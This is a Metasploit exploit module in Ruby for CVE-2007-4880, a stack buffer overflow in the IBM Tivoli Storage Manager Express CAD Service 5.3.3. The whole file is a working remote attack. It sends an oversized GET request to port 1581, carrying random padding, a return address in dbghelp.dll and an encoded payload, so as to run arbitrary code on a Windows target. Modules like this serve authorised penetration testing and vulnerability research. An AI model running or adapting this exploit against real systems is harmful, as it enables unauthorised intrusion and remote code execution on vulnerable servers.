## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'IBM Tivoli Storage Manager Express CAD Service Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the IBM Tivoli Storage Manager Express CAD Service (5.3.3). By sending an overly long GET request, it may be possible for an attacker to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 'References' => [ [ 'CVE', '2007-4880' ], [ 'BID', '25743' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Privileged' => true, 'Payload' => { 'Space' => 650, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'IBM Tivoli Storage Manager Express 5.3.3', { 'Ret' => 0x0289fbe3 } ], # dbghelp.dll ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 24 2007')) register_options( [ Opt::RPORT(1581) ], self.class ) end def exploit connect sploit = "GET /BACLIENT HTTP/1.1\r\n" sploit << "Host: 127.0.0.1 " + rand_text_alpha_upper(190) sploit << [target.ret].pack('V') + payload.encoded print_status("Trying target %s..." % target.name) sock.put(sploit + "\r\n\r\n") handler disconnect end end